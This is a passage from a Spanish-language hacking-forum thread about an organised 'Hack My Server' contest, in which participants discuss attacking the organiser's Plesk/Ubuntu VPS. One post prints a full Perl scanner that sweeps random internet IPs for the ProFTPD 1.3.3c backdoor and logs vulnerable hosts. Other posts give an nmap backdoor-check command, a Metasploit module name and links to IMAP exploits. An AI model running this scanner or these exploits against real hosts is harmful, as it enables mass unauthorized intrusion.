El problema es que con un SQLi tendrás que escalar mucho, pero puede funcionar.

Cita de: puntoinfinito en 2 Mayo 2012, 15:24 pm

Yo estoy preparando todo tipo de cosas para probarlas en cuanto dimitrix me pase su IP xD
¿Me la pasas por favor? Así comenzaré a probar :P

Saludos

No tengo ningún MP tuyo, pero ya te lo he enviado :-P

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: [u]nsigned en 2 Mayo 2012, 15:40 pm

Me apunto.

Por otro lado, y no es por tirar malas onda, pero si es un VPS contratado, con plesk y toda la cosa, seguramente este actualizado y bien configurado. Cada VPS nuevo que una empresa alquila no es ams que una copia de una 'imagen' virtual preconfigurada, y dicha empresa depende totalmente de que sus productos sean muy seguros. Es decir, es muyy difcil que un servicio de pago no brinde la mayor seguridad posible y actualizaciones mas recientes de su software... :silbar:

Asi que basicamente estariamos auditando gratis xD

Saludos

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: h3ct0r en 2 Mayo 2012, 15:44 pm

Mejor aun para testear nosotros, si logramos entrar a un servidor actualizado y en "produccion" es muchisimo mas interesante y divertido. Si no logramos entrar, pues bueno... A seguir estudiando! :P

Hay que verle el lado positivo a todo!

Estoy revisando esas sqlinjection y hasta ahora nada, voy a instalar ese plesk aqui local para probar, cualquier novedad la posteo.

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 2 Mayo 2012, 15:49 pm

Cita de: El As del Club Paris en 2 Mayo 2012, 15:40 pm

No lo veo cierto de todo, en un VPS/Servidor no administrado la seguridad corre de tu parte.

Además que una se monta el servidor ellos no actualizan el VPS, lo máximo que hacen es una vez al mes enviarte instrucciones de como arreglar los nuevos bugs que han salido, pero ellos no lo arreglan ni lo tocan.

Por otra si el día 15 nadie ha conseguido algo, intalaré aplicaciones 'corrientes' pero que sepa que tienen vulnerabilidades.

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 2 Mayo 2012, 15:50 pm

Ahhh a todo esto, las versiones que están instaladas ya son viejas, no son las más actuales.

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: maxim_o en 2 Mayo 2012, 16:34 pm

Bueno leyendo y consultando con nuestro amigo google el proftpd 1.3.3c si las configuraciones están por defecto será dificil romper, ya que lo único que encontre solo funciona si tiene el mod_sql instalado y funcionando y por defecto no es así.
Asi que tendremos que centrarnos en el plesk y/o en otros servicios....

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: adastra en 2 Mayo 2012, 18:38 pm

el servicio proftpd que esta instalado no es vulnerable.
Podéis probarlo con el script "bitchscan.pl" o directamente desde el modulo de metasploit "exploit/unix/ftp/proftpd_133c_backdoor"

Para los que querais probar el script, pongo el código
en la linea
$ip = "x.x.x.x";
poner la dirección que os han enviado por correo, el script encuentra que el servicio tiene la versión que es vulnerable, pero después de ejecutar, no es posible establecer el backdoor, indicando que el servicio no es "hackeable".

Código:

#!/usr/bin/perl
use IO::Socket;
## IP GENERATOR ##
print "\n! ProScan - Started !\n";

sub ipgen(){
my $range1 = 223;        #avoid experimental and multicast
my $range2 = 240;                
$oct1 = int(rand($range1)) + 1;        #generate random octects
$oct2 = int(rand($range2)) + 1;
$oct3 = int(rand($range2)) + 1;
$oct4 = int(rand($range2)) + 1;

if($oct1 == 127 || $oct1 == 172 || $oct1 == 192 || $oct1 == 10){#if gets rid of loopbacks and private ips
$ip = &ipgen();        #if local or private call again
}else{
#$ip = "$oct1.$oct2.$oct3.$oct4";                # otherwise allocate the ip to return
$ip = "x.x.x.x";
}
return $ip;        #return to caller        
}
##
## MAIN ##
while(1==1){        # keeps code running indefinatly
$target = &ipgen();        # get random ip to scan
print "SCANNING: $target \n";        # output
my $sock = new IO::Socket::INET (                # try to create socket to chose random address
                 PeerAddr => $target,
                 PeerPort => '21',      
                 Proto => 'tcp',
                 Timeout => '3',         # you can get away with a timeout of 1 second but i have 3 to be safe
                 );
if($sock){        # if socket opened (port open)

sysread($sock,$buf,1024);        # readheader - may need to make the buffer size 4096 instead of 1024
print "FTP SUCCESS: $target \n";                # print to screen
if ($buf =~ m/ProFTPD 1.3.3c/){
  print "\n!!Proftpd 1.3.3c Found!!\n";
  print $sock "HELP ACIDBITCHEZ\n";
  sysread($sock,$buf,1024);
  if ($buf =~ m/502/){
	print "\n NOT HACKABLE \n";
  }else{
  	  print $buf;
	  print "\n\n HACKABLE BOX FOUND \n\n";
          open (MYFILE, '>>proftpd_1.3.3c-exploitable.txt');
          print MYFILE "Proftp Found: $target :$buf\n";
	  close(MYFILE);
}

}
}
close($sock);        # close the socket
}##

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Once en 2 Mayo 2012, 19:07 pm

Incluso con nmap:

Código:

nmap --script=ftp-proftpd-backdoor.nse <ip> <puerto>

Saldos!

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: $Edu$ en 2 Mayo 2012, 19:19 pm

Por fin pude!!!!

No mentira, Dimitrix, vos sabes si es vulnerable o no? esque sino me suena a que quieres ver que tan seguro es tu servidor xD Pensaba que vos ya sabrias que se podia hackear y nosotros tendriamos que probar, pero por como veo que han buscando info y todo y no hay caso :/

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 2 Mayo 2012, 19:27 pm

Cita de: $Edu$ en 2 Mayo 2012, 19:19 pm

Por fin pude!!!!
No mentira, Dimitrix, vos sabes si es vulnerable o no? esque sino me suena a que quieres ver que tan seguro es tu servidor xD Pensaba que vos ya sabrias que se podia hackear y nosotros tendriamos que probar, pero por como veo que han buscando info y todo y no hay caso :/

Todo servidor es hackeable, hace falta encontrar la vulnerabilidad.

El servidor no tiene ni firewall ni nada, no obstante si el día 15 (o mejor el 7) nadie consigue nada, iré bajando la seguridad.

Estoy pensando que por ahora la seguridad perimetral es quizás muy difícil para casi todos por lo que el mes que viene haré.
- Hack My Server: Joomla
- Hack My Server: WP

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: lokitorz en 2 Mayo 2012, 20:02 pm

Buenas ví que tiene un servidor de correo IMAP. Creo que IMAP tiene una vulnerabilidad que mediante un desbordamiento de buffer se podría conseguir obtener una shell... Me voy a poner a ello.

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: josezoft en 2 Mayo 2012, 21:25 pm

Me puedes pasar la ip por privado :)

Saludos

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Xenomorfo77 en 2 Mayo 2012, 23:14 pm

Hola señores, todavia no he mirado nada de esto, se sabe si hay alguna cuenta en el FTP? Buscando por la red encontre una vulnerabilidad para las versiones inferiores a la 1.3.3g. La vulnerabilidad se basa en enviar un comando inexistente o erroneo al servidor mientras se esta descargando o subiendo un archivo. La vulnerabilidad permitiria inyectar cogido arbitrario.

http://foro.elhacker.net/scripting/ayuda_con_script_python-t360564.0.html (http://foro.elhacker.net/scripting/ayuda_con_script_python-t360564.0.html)

En ese link creado por mi teneis los scripts pero para uso local y necesitamos alguien con conocimientos en python para que lo pase a remoto, yo lo he intentado pero no tengo ni idea de python si alguien sabe que ponga la respuesta en el link. Un saludo y suerte.

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: h1t en 2 Mayo 2012, 23:18 pm

Hola buenas después de mirar la información de dimitrix sobre los servicios del server, voy a probar el siguiente:
Servicio
22/tcp open ssh OpenSSH 5.3p1 Debian 3ubuntu7 (protocol 2.0)

voy a investigar un poco más sobre eso y a ver que sale.

: )

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: pajaras en 3 Mayo 2012, 00:04 am

me puedes enviar la IP?
mercii!

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: peib0l en 3 Mayo 2012, 00:22 am

quiero la ip ... manda-mela a @elhacker

me la suda el server yo solo quiero la cerveza, y lo sabes :xD :xD soy un borracho jajaja

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: kub0x en 3 Mayo 2012, 01:10 am

Cita de: lokitorz en 2 Mayo 2012, 20:02 pm

Buenas ví que tiene un servidor de correo IMAP. Creo que IMAP tiene una vulnerabilidad que mediante un desbordamiento de buffer se podría conseguir obtener una shell... Me voy a poner a ello.

Estuve escaneando de todo ayer, y me vino a la cabeza esta vulnerabilidad. Encontré un exploit pero es para BSD. Como no entiendo asm no sé como establecer la dirección de la pila correctamente por lo que me quedo sin probarlo :/

Por lo demás estoy como vosotros, he probado exploit por ftp, pop, imap y sigo a dos velas, aun así seguiré investigando :D

Saludos.

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 3 Mayo 2012, 01:13 am

Si vemos que no lo conseguimos, instalo más aplicaciones y modifico otras para que sea vulnerable.

La que ya tengo vista es instalar la de proFTP la vulnerable, que tengo ganas de practicar^^

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Breixo en 3 Mayo 2012, 01:33 am

Cita de: dimitrix en 3 Mayo 2012, 01:13 am

Si vemos que no lo conseguimos, instalo más aplicaciones y modifico otras para que sea vulnerable.

La que ya tengo vista es instalar la de proFTP la vulnerable, que tengo ganas de practicar^^

Una idea que se me pasa por la cabeza es que también se podría poner alguna aplicación web vulnerable, desde ella se podría subir una shell(php por ejemplo) y una vez conseguido esto ganar privilegios de root con algún exploit que solo sea local.

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 3 Mayo 2012, 02:25 am

Breixo eso ya lo comenté. Esa es la idea del concurso nº2 y nº3.

Atacar webs con Joomla o WP y ciertos módulos.

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Belial & Grimoire en 3 Mayo 2012, 02:49 am

hola

pues yo estoy intentando con IMAP, al rato posteo lo que encontre aunque no creo que me funcione para tener acceso... por cierto

dimitrix, podrias verificar la direccion /etc/passwd si hubo algun cambio o algo, es que no se si logre agregar algo o solo fue un error en un exploit

tambien al rato posteo ese exploit, salu2

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Breixo en 3 Mayo 2012, 02:56 am

Cita de: dimitrix en 3 Mayo 2012, 02:25 am

Breixo eso ya lo comenté. Esa es la idea del concurso nº2 y nº3.

Atacar webs con Joomla o WP y ciertos módulos.

ok, no me fijara en el mensaje. :D

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 3 Mayo 2012, 03:18 am

Vale, saco estos datos:
Ubuntu 10.04 LTS + Plesk 10.2

Creo que se puede atacar con esto:
php -d safe_mode=0 plesk_remote_vulnerability_checker.php

Cita de: Belial & Grimoire en 3 Mayo 2012, 02:49 am

Parece que no está modificado.

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Belial & Grimoire en 3 Mayo 2012, 04:53 am

que mala suerte, bueno pues mañana lo intentare de nuevo, tampoco pude con ProFTPD, metasploit no pudo

estos son los exploits con los que intente

http://securityvulns.ru/files/sm00ny-courier_imap_fsx.c

http://old.honeynet.org/papers/enemy/imapd_exploit.txt

salu2

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: s4dr10s en 3 Mayo 2012, 04:58 am

dimitrix porfavor mandame la ip del servidor por mp

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Belial & Grimoire en 3 Mayo 2012, 04:58 am

al parecer plesk tiene un fallo en Agent.php, pero lamentablemente casi no se mucho sobre SQLi, tratare de buscar como lograrlo, ya que ayer fue lo primero que encontre sobre subir privilegios... pero por lo mismo que no se mucho sobre eso, lo quise dejar para despues e intentar con exploits, pero lo hare a ver que puedo encontrar

salu2

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: jnet en 3 Mayo 2012, 08:14 am

Hola a tod@s!

Estoy de baja en casa y, sinceramente, hace mucho que no trasteo. Mis noches interminables detrás de una consola quedan muy atrás y me gustaría recordar y evolucionar un poco. ¿Cómo puedo participar? ¿A quien le pido la IP del servidor?

Gracias!

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: jnet en 3 Mayo 2012, 08:32 am

Cita de: jnet en 3 Mayo 2012, 08:14 am

Ya, ya la he pedido, me faltaba leer un poco más.

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: brujo29 en 3 Mayo 2012, 14:43 pm

Nos tenemos k esconder nuestra direccion ip?

Gracias
Salu2

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: m0rf en 3 Mayo 2012, 19:46 pm

Cita de: brujo29 en 3 Mayo 2012, 14:43 pm

Nos tenemos k esconder nuestra direccion ip?

Gracias
Salu2

Evidentemente es indiferente ya que es una cosa organizada y legal.

Bueno, a lo que iba.

CVE-2011-4130, es vulnerable hasta la 1.3.3g diria

Si hacéis el exploit para este bug podreis compromenter todos los proftpd excepto los 1.3.4 y el 1.3.3g. Este es el c.

Pues nada yo tengo el server 1.3.3c bajado que le estuve echando un ojo. Lo probare con ubuntu 10.04 lts ya que dimitrix se ha tomado la molestia de comentarlo.

Lo comento porque la naturaleza del concurso es ir poniendo el desarrollo o en que estamos trabajando.

Realmente el exploit si que existe pero es de pago o solo para organizaciones que se dedican a la seguridad o gobiernos.

Bueno ya os comento si avanzo.

Saludos.

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Xenomorfo77 en 3 Mayo 2012, 20:08 pm

Cita de: m0rf en 3 Mayo 2012, 19:46 pm

Evidentemente es indiferente ya que es una cosa organizada y legal.

Saludos morf en la pagina anterior de este mismo post hay un mensaje mio diciendo lo mismo pero no he tenido tiempo para probarla, http://foro.elhacker.net/scripting/ayuda_con_script_python-t360564.0.html (http://foro.elhacker.net/scripting/ayuda_con_script_python-t360564.0.html)

En ese enlace tienes los 2 scripts para probar la vulnerabilidad, son para modo local y necesitas una cuenta y un archivo que descargar tenlo en cuenta. Pruebalo y nos comentas. Un saludo!

Se me olvidaba, el comando falso "WXYZ 0wn3d" debe ir así "WXYZ *0wn3d/"

Si quereis un analisis completo de esta vulnerabilidad aqui teneis: http://blog.buguroo.com/?p=3951 (http://blog.buguroo.com/?p=3951)

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: maxim_o en 3 Mayo 2012, 20:24 pm

En efecto... Esta web http://blog.buguroo.com/?p=3951 ya la habia visto.... pero en nuestro caso no nos funcionaria por que no tenemos cuenta para identificarnos como usuario en proftpd... Por lo tanto no podemos usar esa vulnerabilidad....
Había otra tambien pero necesita tener cargado el mod_sql.... que tampoco viene de serie....

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: m0rf en 3 Mayo 2012, 20:30 pm

Use-after-free vulnerability in the Response API in ProFTPD before 1.3.3g allows remote authenticated users to execute arbitrary code via vectors involving an error that occurs after an FTP data transfer.

Fuck no leí lo de authenticated T.T'

Gracias Xenomorfo77 por evitarme perder como media hora de mi vida xD

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Xenomorfo77 en 3 Mayo 2012, 20:56 pm

Seria muy interesante saber explotar esta vulnerabilidad ya que aunque no nos sirva para este caso, hay muchisimos hosts con una version inferior, que seria vulnerable, lo malo es que si lo descubrimos y posteamos aqui puede haber algun usuario malintencionado que se dedique a reventar todo lo que pille :S .Si no conseguimos nada pues se podria crear un usuario y probarla ya que dimitrix tiene acceso. Un saludo.

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: jma1e en 3 Mayo 2012, 21:24 pm

Hola!

Nuevo escribiendo en el foro, aunque lo sigo desde hace tiempo. La verdad es que me gustaría poder jugar un poco con esto :D

¿Alguien me puede dar la ip?

Thanks ;)!

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: juan196518 en 4 Mayo 2012, 01:42 am

Creo que con Shadow Security Scan se pueden ver las Vulnerabilidades de un server :o

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Xenomorfo77 en 4 Mayo 2012, 01:57 am

Cita de: juan196518 en 4 Mayo 2012, 01:42 am

Creo que con Shadow Security Scan se pueden ver las Vulnerabilidades de un server :o

Lógico, para eso sirve un escaner de vulnerabilidades. Te recomiendo que te mires otro escaner, ya que ese es un poco para novatos y no me convence demasiado. Yo utilizo nessus integrado en metaexploit framework con backtrack 5. Es fácil de instalar y usar te recomiendo que le eches un vistazo. Si no también tienes OpenVas, NeXpose y un largo etcétera. Saludos.

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: juan196518 en 4 Mayo 2012, 02:21 am

Gracias Xenomorfo77 tambien tengo NeXpose pero me parecio mejor el SSS despues pruebo y comento.
::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::)

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: juan196518 en 4 Mayo 2012, 04:18 am

Por el proftp no se puede acceder porque no hay una cuenta creada :-\

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 4 Mayo 2012, 11:51 am